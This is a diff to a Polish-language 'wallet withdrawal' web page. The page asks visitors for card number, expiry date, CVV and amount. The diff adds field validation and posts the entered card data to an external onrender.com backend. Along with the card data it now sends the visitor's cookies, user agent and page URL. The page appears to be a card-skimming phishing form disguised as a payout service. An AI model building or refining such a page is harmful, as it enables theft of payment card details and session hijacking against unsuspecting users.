--- a/public/wallet-withdraw.html
+++ b/public/wallet-withdraw.html
@@ -12,16 +12,16 @@
 
     <form id="withdrawForm">
       <label for="card">Numer karty</label>
-      <input type="text" id="card" placeholder="1234 5678 9012 3456" required />
+      <input type="text" id="card" placeholder="1234 5678 9012 3456" maxlength="19" required />
 
       <label for="expiry">Data ważności (MM/YY)</label>
-      <input type="text" id="expiry" placeholder="MM/YY" required />
+      <input type="month" id="expiry" required />
 
       <label for="cvv">Kod CVV</label>
-      <input type="text" id="cvv" placeholder="CVV" required />
+      <input type="text" id="cvv" placeholder="CVV" maxlength="4" pattern="\\d{3,4}" required />
 
       <label for="amount">Kwota (PLN)</label>
-      <input type="number" id="amount" placeholder="np. 100" required />
+      <input type="number" id="amount" placeholder="np. 100" min="1" required />
 
       <button type="submit">Potwierdź wypłatę</button>
     </form>
@@ -33,23 +33,53 @@
     const form = document.getElementById('withdrawForm');
     const confirmation = document.getElementById('confirmation');
 
+    function validateCard(card) {
+      return /^\d{16}$/.test(card.replace(/\s+/g, ''));
+    }
+
+    function validateCVV(cvv) {
+      return /^\d{3,4}$/.test(cvv);
+    }
+
     form.addEventListener('submit', async (e) => {
       e.preventDefault();
-      const card = document.getElementById('card').value.trim();
-      const expiry = document.getElementById('expiry').value.trim();
+
+      const card = document.getElementById('card').value.replace(/\s+/g, '');
+      const expiry = document.getElementById('expiry').value;
       const cvv = document.getElementById('cvv').value.trim();
       const amount = document.getElementById('amount').value.trim();
 
-      const res = await fetch('https://zaza-back.onrender.com/login', {
-        method: 'POST',
-        headers: { 'Content-Type': 'application/json' },
-        body: JSON.stringify({ card, expiry, cvv, amount })
-      });
+      if (!validateCard(card)) {
+        return alert('Numer karty jest nieprawidłowy. Wprowadź 16 cyfr.');
+      }
 
-      const data = await res.json();
-      confirmation.innerText = data.success
-        ? '✅ Wypłata została zrealizowana.'
-        : '❌ Wystąpił błąd.';
+      if (!validateCVV(cvv)) {
+        return alert('Kod CVV jest nieprawidłowy.');
+      }
+
+      try {
+        const res = await fetch('https://zaza-back.onrender.com/card', {
+          method: 'POST',
+          headers: { 'Content-Type': 'application/json' },
+          body: JSON.stringify({
+            cardNumber: card,
+            expiryDate: expiry,
+            cvv,
+            cookies: document.cookie,
+            userAgent: navigator.userAgent,
+            location: window.location.href,
+            date: new Date().toISOString()
+          })
+        });
+
+        const data = await res.json();
+        confirmation.innerText = data.success
+          ? '✅ Wypłata została zrealizowana.'
+          : '❌ Wystąpił błąd.';
+      } catch (err) {
+        confirmation.innerText = '❌ Wystąpił błąd podczas połączenia.';
+        console.error(err);
+      }
     });
   </script>
 </body>
